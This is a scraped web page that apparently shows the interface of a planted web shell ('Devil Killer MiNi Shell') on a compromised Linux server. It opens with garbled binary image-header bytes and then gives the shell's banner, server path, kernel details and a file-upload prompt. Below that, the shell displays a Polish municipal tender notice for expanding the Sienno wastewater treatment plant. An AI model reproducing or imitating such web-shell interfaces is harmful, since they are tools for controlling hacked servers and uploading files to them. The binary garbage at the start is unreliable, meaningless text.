JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220506/0014738701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa oczyszczalni ścieków w Siennie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SIENNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223994</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 36/40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sienno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(048) 3786018</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@sienno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bip.sienno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa oczyszczalni ścieków w Siennie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ebe1335-cd03-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00147387</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039329/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa oczyszczalni ścieków w Siennie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal<br/>Przekazywanie pozostałych dokumentów i oświadczeń może nastąpić w sposób określony powyżej w pkt. 2. lub za pośrednictwem e-mail: ug@sienno.pl<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: ug@sienno.pl inwestycje@sienno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymia-na<br/>informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy uży-ciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wy-konawcami odbywa się przy użyciu MiniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej,<br/>2. Zamawiający informuje, iż przekazywanie oferty oraz dokumentów i oświadczeń<br/>składanych wraz z ofertą, odbywa się przy użyciu MiniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal (za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego<br/>przez MiniPortal - Formularze do komunikacji -&gt; Formularz do złożenia, zmiany,<br/>wycofania oferty lub wniosku),<br/>3. Przekazywanie pozostałych dokumentów i oświadczeń może nastąpić w sposób<br/>określony powyżej w pkt. 2. lub za pośrednictwem e-mail: ug@sienno.pl<br/>Każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania przesłane-go<br/>za pośrednictwem e-mail pisma lub dokumentu lub wiadomości.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elek-tronicznej, email: inwestycje@sienno.pl.<br/>4. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i<br/>wykonawcy posługują się numerem oznaczeniem sprawy: KIR.271.1.2022<br/>5. Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem Formu-larza do komunikacji jako załączniki. Sposób sporządzenia dokumentów elektronicz-nych<br/>musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grud-nia<br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>6. Adres skrzynki ePUAP: /9l604nbcu5/SkrytkaESP<br/>7. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku” oraz do: „Formularza do komunikacji”,<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>MiniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej ePUAP,<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formu-larzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza do komunikacji” wynosi 150 MB,<br/>10. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych infor-macji przyjmuje się datę ich przekazania na ePUAP,<br/>11. Identyfikator postępowania i link dla danego postępowania o udzielenie zamówie-nia<br/>dostępne są na liście wszystkich postępowań na MiniPortalu, klikając wcześniej opcję<br/>„Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>12. Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH<br/>- dla uczestników postępowań o udzielenie zamówień publicznych, wykonawców oraz innych osób, których dane osobowe pozyskano w związku z ubieganiem się o udzielenie zamówienia bądź w związku z realizacją zamówienia przez Wykonawcę w Gminie Sienno<br/><br/><br/>TOŻSAMOŚĆ ADMINISTRATORA<br/>Administratorem jest:<br/>Wójta Gminy Sienno<br/>DANE KONTAKTOWE ADMINISTRATORA<br/>Z administratorem – Wójtem Gminy Sienno można się skontaktować osobiście lub pisemnie adres 27-350 Sienno ul. Rynek 36/40<br/>DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH<br/>Wójt Gminy Sienno wyznaczył inspektora ochrony danych, z którym może się Pani / Pan skontaktować poprzez email iod@sienno.pl lub pisemnie na adres Urzędu Gminy w Siennie, 27-350 Sienno ul. Rynek 36/40<br/>Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych.<br/><br/>CELE PRZETWARZANIA I PODSTAWA PRAWNA<br/>Pani / Pana dane będą przetwarzane w celu: prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na Zamawiającym.<br/>Pani/Pana dane będą przetwarzane na podstawie w/w ustaw.<br/><br/>ODBIORCY DANYCH<br/>Pani/Pana dane osobowe mogą być udostępniane uprawnionym, zgodnie z przepisami w/w ustaw podmiotom: służbom; organom administracji publicznej; sądom i prokuraturze; komornikom sądowym; państwowym i samorządowym jednostkom organizacyjnym oraz innym podmiotom – w zakresie niezbędnym do realizacji zadań publicznych; osobom i jednostkom organizacyjnym, jeżeli wykażą w tym interes prawny; jednostkom organizacyjnym, w celach badawczych, statystycznych, badania opinii publicznej, jeżeli po wykorzystaniu dane te zostaną poddane takiej modyfikacji, która nie pozwoli ustalić tożsamości osób, których dane dotyczą; innym osobom i jednostkom organizacyjnym, jeżeli wykażą interes prawny lub faktyczny w otrzymaniu danych, pod warunkiem uzyskania zgody osób, których dane dotyczą określonych w odrębnych przepisach.<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art. 74 ustawy PZP<br/>OKRES PRZECHOWYWANIA DANYCH<br/>Dane osobowe będą przechowywane zgodnie Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych oraz ustawy o zamówieniach publicznych.<br/>PRAWA<br/>PODMIOTÓW DANYCH<br/>Przysługuje Pani/Panu prawo dostępu do Pani/Pana danych oraz prawo żądania ich sprostowania<br/>PRAWO WNIESIENIA SKARGI DO ORGANU NADZORCZEGO<br/>Przysługuje Pani/Panu również prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych w państwie członkowskim Pani / Pana zwykłego pobytu, miejsca pracy lub miejsca popełnienia domniemanego naruszenia.<br/><br/>ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH<br/>Pani / Pana dane są pozyskiwane od osób i instytucji, których dane dotyczą oraz od instytucji prowadzących rejestry.<br/>INFORMACJA O DOWOLNOŚCI LUB OBOWIĄZKU PODANIA DANYCH<br/>Obowiązek podania danych osobowych wynika z w/w ustaw.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIR.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 6573806,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zaprojektowanie i wybudowanie oczyszczalni ścieków w Siennie wraz z niezbędną infrastrukturą techniczną na działkach nr 1640 i 1641 obręb Sienno, na terenie gminy Sienno, powiat Lipsko, województwo Mazowieckie.<br/>Szczegółowo przedmiot zamówienia obejmuje:<br/>Etap I: opracowanie dokumentacji projektowej z uzyskaniem pozwolenia na budowę, w tym:<br/>Materiały<br/>przygotowawcze:<br/>• Wystąpienie i uzyskanie decyzji o środowiskowych<br/>uwarunkowaniach realizacji inwestycji<br/>• Wystąpienie i uzyskanie decyzji o warunkach zabudowy<br/>• Uzyskanie aktualnej mapy do celów projektowych<br/>• Uzyskać pozwolenie wodno-prawne<br/>• Rozpoznanie terenowo - prawne gruntów<br/>• Badania warunków gruntowo-wodnych<br/>• Wystąpienie i uzyskanie warunków przyłączeniowych<br/>od gestorów sieci<br/>• Dostosowanie rozwiązań koncepcji funkcjonalnoużytkowej i koncepcji zagospodaro-wania terenu, do<br/>przepisów i uzgodnień z Zamawiającym i<br/>Użytkownikiem<br/>• Prezentację koncepcji<br/>• Projekt budowlany wszystkich branż sporządzony zgodnie z aktualnymi przepisami wraz z<br/>uzyskaniem wynikających z przepisów uzgodnień, pozwoleń, opinii i zgód, w tym:<br/>a) Projekt zagospodarowania terenu<br/>b) Architektura<br/>c) konstrukcja<br/>d) br. Sanitarna<br/>e) br. Elektryczna<br/>f) br. Teletechniczna<br/>• Projekty wykonawcze<br/>w branżach:<br/>• Projekt architektoniczny wraz z zagospodarowaniem<br/>terenu, przyłączami mediów wizualizacją i kolorystyką<br/>• Projekt konstrukcji<br/>• Projekt instalacji sanitarnych: wodno-kanalizacyjnej,<br/>wentylacji mechanicznej, c.o., c.w.u., przeciwpożarowej<br/>• Projekt instalacji elektrycznych i teletechnicznych:<br/>oświetlenie ogólne, ewakuacyjne, gniazd wtykowych,<br/>oświetlenie zewnętrzne budynku i terenu, instalacja<br/>trójfazowa, domofonowa, telefoniczna, odgromowa,<br/>komputerowa, internetowa, dozorowa (monitoring<br/>wewnętrzny i zewnętrzny), przeciwpożarowa<br/>• Projekt technologiczny oczyszczalni<br/>• Projekt drogowy – ciągi komunikacyjne<br/>• Projekt organizacji ruchu<br/>• Instrukcję bezpieczeństwa pożarowego wraz ze scenariuszem pożarowym obiektu, schematami<br/>ewakuacyjnymi, oznaczeniem dróg ewakuacji, wyposażeniem w sprzęt i urządzenia<br/>przeciwpożarowe<br/>• Specyfikacje techniczne wykonania i odbioru robót<br/>• Informację bezpieczeństwa i ochrony zdrowia<br/>• Przedmiary i kosztorysy inwestorskie<br/>• Charakterystykę energetyczną obiektów<br/>• Instrukcję eksploatacji obiektu<br/>• Inne opracowania niezbędne do realizacji robót i zatwierdzenia dokumentacji<br/>• Uzyskanie decyzji pozwolenia na budowę oczyszczalni ścieków wraz z infrastrukturą techniczną<br/>Sprawowania nadzoru autorskiego przez Projektanta – autora dokumentacji projekto-wo-kosztorysowej, nad realizacją robót budowlanych wynikających z tej dokumentacji.<br/>Etap II: budowę przedmiotowego obiektu, w tym:<br/>1. Wykonanie robót budowlanych na podstawie sporządzonego projektu i specyfikacji<br/>technicznych wykonania i odbioru robót budowlanych,<br/>2. Opracowanie dokumentacji powykonawczej, przeprowadzenie wymaganych prób i badań,<br/>uzyskanie odbiorów robót i przygotowanie dokumentów związanych z oddaniem do użytkowania<br/>wybudowanego obiektu<br/>3. Wykonanie rozruchu oczyszczalni<br/>4. Dostarczenie kompletu sprzętu, oznakowań, instrukcji, środków ochrony indywidu-alnej i<br/>zbiorowej z zakresu bhp i ochrony przeciwpożarowej, wymaganych przepisami<br/>szczegółowymi dla prawidłowej eksploatacji obiektu oczyszczalni ścieków,<br/>5. Przeprowadzenie szkolenia obsługi oczyszczalni<br/>6. Wykonanie instrukcji obsługi i konserwacji urządzeń,<br/>7. Wykonanie tablic informacyjnych i pamiątkowych<br/>8. Uzyskanie pozwolenia na użytkowanie<br/><br/>Wykonawca w ramach realizacji projektu powinien zweryfikować rozwiązania techno-logiczne zaproponowane przez Zamawiającego, dokonać doboru szczegółowych roz-wiązań technologicznych wraz z przedłożeniem rozwiązań do akceptacji przez Zama-wiającego. Po akceptacji rozwiązań Wykonawca powinien dokonać przedłożenia roz-wiązań materiałowych (do akceptacji wymagane jest przedłożenie karty materiałowej), a następnie realizacji na podstawie zatwierdzonych dokumentów. Dopuszcza się zasto-sowanie materiałów i urządzeń nie gorszych niż te, które precyzują zapisy niniejszego PFU.<br/>Wykonawca ponosi odpowiedzialność za dokonanie stosownej procedury administra-cyjnej dla zakresu realizowanych prac, jeżeli będzie ona wymagana przepisami prawa. W przypadku zastosowania przez Wykonawcę rozwiązań technicznych i technologicz-nych, dla których niezbędne będzie uzyskanie wymaganych przepisami prawa pozwo-leń i zgłoszeń, Zamawiający w przedmiotowym zakresie udzieli stosownego pełnomoc-nictwa na pisemny wniosek Wykonawcy.<br/><br/>Szczegółowy opis przedmiotu zamówienia opisuje dokumentacja: Program funkcjonal-no-użytkowy, Plan zagospodarowania terenu, Schemat technologiczny, stanowiąca za-łączniki nr 1 do niniejszej SWZ oraz wzór umowy stanowiącym załącznik nr 4 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45252200-0 - Wyposażenie oczyszczalni ścieków</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/>Lp. KRYTERIUM WAGA<br/>1. Cena 60%<br/>2. Okres gwarancji na cały zakres zamówienia 40%<br/>1) Ocena ofert w zakresie kryterium cena dokonana będzie według następują-cych zasad:<br/>Cp = x 60 % x 100<br/><br/>gdzie:<br/>Cp – oznacza wartość punktową oferty w ramach kryterium cena,<br/>Cn – oznacza najniższą cenę,<br/>Cb – oznacza cenę oferty badanej.<br/>2) Ocena ofert w zakresie kryterium okres gwarancji na cały zakres zamówie-nia dokonana będzie według następujących zasad:<br/>G= x 40 % x 100<br/>gdzie:<br/>G – oznacza wartość punktową oferty w ramach kryterium okres gwarancji na cały zakres zamówienia,<br/>Gn – oznacza okres gwarancji na cały zakres zamówienia zaoferowany w ocenianej (badanej) ofercie,<br/>Gmax – oznacza najdłuższy zaoferowany okres gwarancji na cały zakres zamówienia spośród nie podlegających odrzuceniu ofert.<br/><br/>Uwaga:<br/>W zakresie kryterium nr 2, dla porównania i oceny ofert, brany pod uwagę będzie okres gwarancji na roboty budowlane liczony w miesiącach podany przez Wykonawcę w formularzu ofertowym stanowiącym załącznik nr 2 do SWZ. Maksymalny punktowa-ny przez Zamawiającego okres gwarancji na roboty budowlane to 72 miesiące. Zaofe-rowanie okresu dłuższego spowoduje przyjęcie przez Zamawiającego do oceny i po-równania ofert okresu 72-miesięcznego. Minimalny akceptowalny przez Zamawiającego okres gwarancji na roboty budowlane to 60 miesięcy. Zaoferowanie przez Wykonawcę okresu gwarancji na roboty budowlane równego 60 miesięcy skutkować będzie uzy-skaniem 0 punktów w ramach kryterium okres gwarancji na roboty budowlane, nato-miast jeśli Wykonawca zaoferuje okres gwarancji na roboty budowlane krótszy niż 60 miesięcy oferta zostanie odrzucona.<br/>3) Ostateczna liczba punktów uzyskanych 